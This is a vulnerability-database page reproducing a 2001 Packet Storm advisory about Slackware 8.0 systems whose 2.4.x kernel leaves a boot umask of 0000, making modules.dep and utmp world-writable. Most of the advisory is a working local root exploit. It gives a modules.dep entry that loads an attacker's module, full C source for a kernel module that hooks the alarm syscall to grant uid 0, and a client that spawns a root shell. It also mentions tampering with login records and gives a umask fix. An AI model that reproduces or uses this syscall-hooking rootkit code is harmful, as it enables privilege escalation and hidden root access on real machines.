Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

slackware.init.txt

🗓️ 18 Jul 2001 00:00:00Reported by JoshType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 37 Views

Vulnerability in Slackware 8.0 allows world writable files in startup scripts. Fix with umask 022.

Code
`I posted this to the linux kernel mailing last Friday, July 13th 2001:  
  
Submitted by : Josh ([email protected]), lockdown  
([email protected]) on July 16th, 2001  
Vulnerability : /lib/modules/2.4.5/modules.dep  
Tested On : Slackware 8.0. 2.4.5  
Local : Yes  
Remote : No  
Temporary Fix : umask 022 at the top of all your startup scripts  
Target : root  
Big thanks to : slider, lamagra, zen-parse  
Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,  
cryptix, s0ttle, xphantom, qtip, tirancy, Loki,  
falcon-networks.com.  
  
The 2.4.x kernels starting with 2.4.3 (i think) have, after  
load, left a umask of 0000. This forces any files created in the bootup  
scripts, without the command `umask 022` issued to be world writeable.  
In slackware, files include /var/run/utmp and /var/run/gpm.pid. This same  
vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep  
world writeable. With this file world writeable, all an intruder need do is  
put something like the following in /lib/modules/`uname -r`/modules.dep  
assuming the system's startup scripts modprobe lp:  
  
/lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o  
  
/tmp/alarm.o:  
  
where the alarm.o module is:  
  
#include <linux/config.h>  
#include <linux/module.h>  
#include <linux/version.h>  
#include <linux/types.h>  
#include <asm/segment.h>  
#include <asm/unistd.h>  
#include <linux/dirent.h>  
#include <sys/syscall.h>  
#include <sys/sysmacros.h>  
  
#include <linux/sched.h>  
  
#include <linux/errno.h>  
#include <linux/fs.h>  
#include <linux/kernel.h>  
  
extern void* sys_call_table[];  
  
unsigned int (*old_alarm) (unsigned int seconds);  
unsigned int hacked_alarm (unsigned int seconds);  
  
unsigned int hacked_alarm(unsigned int seconds)  
{  
if(seconds == 454) {  
current->uid = 0;  
current->euid = 0;  
current->gid = 0;  
current->egid = 0;  
return 0;  
}  
return old_alarm(seconds);  
}  
  
int init_module(void) {  
old_alarm=sys_call_table[SYS_alarm];  
sys_call_table[SYS_alarm] = hacked_alarm;  
return 0;  
}  
  
void cleanup_module(void) {  
sys_call_table[SYS_alarm] = old_alarm;  
}  
  
make a client:  
#include <stdio.h>  
#include <unistd.h>  
  
int main(void)  
{  
alarm(454);  
execl("/bin/sh", "sh", NULL);  
}  
  
which will, when the module is loaded, execute a shell as root.  
  
  
And of course with /var/run/utmp writeable, users can delete or in  
other ways manipulate their logins as they appear in  
w/who/finger/getlogin(), etc.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jul 2001 00:00Current
7.4High risk
Vulners AI Score7.4
vulnerabilityslackware 8.0local accessworld writableumask 022kernel module exploitation
37